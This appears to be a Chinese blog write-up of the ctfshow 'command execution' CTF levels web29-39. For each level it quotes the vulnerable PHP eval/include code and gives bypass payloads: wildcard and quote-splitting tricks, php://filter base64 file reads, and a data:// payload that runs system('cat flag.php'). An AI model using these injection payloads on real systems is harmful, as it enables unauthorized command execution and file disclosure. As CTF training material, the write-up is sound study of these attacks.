ctfshow WEB入门系列 之 命令执行1-10 (web29-39)

最新推荐文章于 2024-04-20 02:40:30 发布
最新推荐文章于 2024-04-20 02:40:30 发布
阅读量786 收藏 3
点赞数
分类专栏: CTF php 文章标签: php web filter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43200143/article/details/114123718
版权
CTF 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
php
2 篇文章 0 订阅
订阅专栏

目录

web29

web30

web31

web32

web33

web34

web35

web36

web37

web38

web39

伪协议总结

web29

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

get传递参数c 执行命令。 c中不能含有flag。

先ls一下看看有啥

?c=system(ls);

直接上通配符解决吧

1.?c=system('cat fla*');

2.?c=echo `nl fl''ag.php`;   flag被''给拼接 为啥可以这样,为什么上面就不行呢???

 

web30

过滤了system和php

1.?c=echo `nl fl''ag.ph''p`;

 

web31

进一步过滤

过滤了空格和. 之前的不好用了。。

 

1.

web32

先进一步理解一下,$c到底是啥。。。。

用本地环境修改一下代码,打印看看

可以看到,它并不会去匹配$nice中获取的下一个参数的具体值。所以这样就可以绕过了

/?c=$a=include$_GET["b"]?>$b=flag.php

但是这样并不行。include包含不了,是因为路径的问题吗?查一下函数

最终会在自己路径下寻找呀

哦,是因为php include包含的文件不会在页面显示出来,无回显!所以需要用伪协议来读

c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-
encode/resource=flag.php

奇怪,为什么本地测试的时候可以呢???

服了,

?c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

?c=$nice=include$_GET["url"]&url=php://filter/read=convert.base64-encode/resource=flag.php

要闭合,过滤了分号;可以用?>来闭合

这答案有问题,根本不需要给c赋值为其他变量,直接include就可以了

最终解:

?c=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web33

多过滤了双引号

那就用数字来表示,不过话说可以直接这样吗,变量,

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

不是必须以字母或者下划线开头吗,

这里不是php的变量,只是传参,应该什么都可以,传个符号都行 比如下划线

web34

 

多过滤了冒号:  不影响啊,还是原先payload

 

web35

多过滤了 = 和 <  不影响,还是原先payload

这么过滤是为了防止

c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

这种,不过这个完全没必要啊,为什么要闭合呢。。。

web36

额,过滤数字,那就用符号 _  —什么的都行,或者直接字母???那前面的为什么要加引号。。。。。。。。吐了。。。

c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

 

web37

获取变量c,如果c不匹配flag(大小写)包含文件。

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

/?c=php://filter/read=convert.base64-encode/resource=flag.php  这个不行,flag会被过滤

不能出现flag的话,可以用伪协议base64输入flag编码后的

 

 

web38

这样子应该是想过滤两种伪协议,上一题的那个还可以用

 

web39

$c 是flag的话不行。。为什么///

那么$c还是flag.php  把后面的给注释掉吧

data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用

 

伪协议总结

 

 

 

 

 

 

 

 

 

 

 

唐仔橙
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctfshow-web入门-命令执行-web29
HkD01L的博客
06-21 330
ctfshow,命令执行web29
CTFSHOW命令执行web入门29-54
m0_73605862的博客
02-09 1995
这里就记录一下ctfshow的刷题记录是web入门命令执行专题里面的题目,他是有分类,并且覆盖也很广泛,所以就通过刷这个来,不过里面有一些脚本的题目发现我自己根本不会笑死。如果还不怎么知道写题的话,可以去看我的gitbook,当然csdn我也转载了我自己的文章。如果你能去我的github为我的gitbook项目点亮星星或者follow me 那我将更开心。并且github和gitbook里面更详细,有更多web安全方面的知识,观感也会更好o。
【ctfshow】 web29 10
manerzi的博客
10-25 114
【ctfshow】 web29 10 键字绕过
CTF-Web29(涉及burpsuite抓包)
→_→
10-02 1339
29.猫抓老鼠 输入数字1后结果: 分析: 题目名为猫抓老鼠,题目提示为catch!catch!catch!……23333,疯狂暗示抓包 打开题目,一个简单的表单: 随手输入一个123,得到的结果是"Check Failed!",那么也就是说应该是要我们输入正确的内容得到答案,那么这里我们开始进行抓包,我们先尝试抓取请求信息,这里用到的是Burp Suite工具: 只是请求头信息的话我们并不能看出有什么东西,那么这里的思路改变为抓取响应头信息。右键,将信息发送到Repe..
CTFSHOW-命令执行
Monica的博客
09-03 4181
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2742
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
【CTFshow】命令执行web29-web54
weixin_51614272的博客
02-23 2782
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令执行 过滤了flag键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 899
ctfshow,命令执行web31
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1323
ctfshow web29 web30 web31
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 279
ctfshow,命令执行,web30
ctfshow web入门 命令执行web29-web57详解
最新发布
2401_84009549的博客
04-20 856
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
CTFshow web入门命令执行总结
小白的博客
05-10 474
1、命令执行函数。
ctfshow web入门 命令执行29-32
ts6666a的博客
02-05 588
web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match 函数用于执行一个正则表达式匹配。/i意味着不分大小写。本句含义是不能用flag值且忽略了大小写。说明对flag进行
CTF命令执行
qq_45086218的博客
03-02 3109
文章目录通配符*号?号常用命令其他姿势 本文以ctf.show网站题目为例,总结ctf中的命令执行姿势 通配符 if(!preg_match("/flag/i", $c)){ eval($c); } *号 c=system('cat *.php'); c=system('cat f*'); ?号 c=system('cat fla?????'); c=system('cat f?????hp'); 常用命令 system() passthru() exec() shell_e
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 972
CTF,ctfshow,命令执行
CTFshow_命令执行
qq_45927819的博客
11-20 1268
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
ctfshow web1-10
m0_50237943的博客
01-31 1886
CTFSHOW WEB(1-10) web1 签到题 F12,在注释里得到一串字符串,base64解码可得flag web2 最简单的sql注入 直接sqlmap一把梭 web3 考点是文件包含和PHP伪协议,可以利用php://input协议,在POST正文中写下PHP代码,被包含进去执行: 可以看到flag在ctf_go_go_go这个目录下,接着在cat一下就出flag了 web4 web4和web3类似,但是过滤了一堆php的伪协议,这时候想到可能是包含本地的什么文件,最后知道了是包含日志文件
正则表达式中的flags
坑底Z蛙
03-17 3737
re.I    IGNORECASE, 忽略大小写的匹配模式In [59]: s = 'hello World!' In [60]: regex = re.compile("hello world!", re.I) In [61]: regex.match(s).group() Out[61]: 'hello World!'re.M    MULTILINE,多行模式, 改变 ^ 和 $ 的行...
ctfshow之web入门-命令执行(1)web29-38
weixin_47726676的博客
04-22 267
题目来自CTFshow-web入门-命令执行 web29 安装hackbar 启动环境,看到正则表达式过滤掉flag error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 点击F12开启hackbar窗口,使用?c=phpinf
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source(&#39;flag.php&#39;)来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值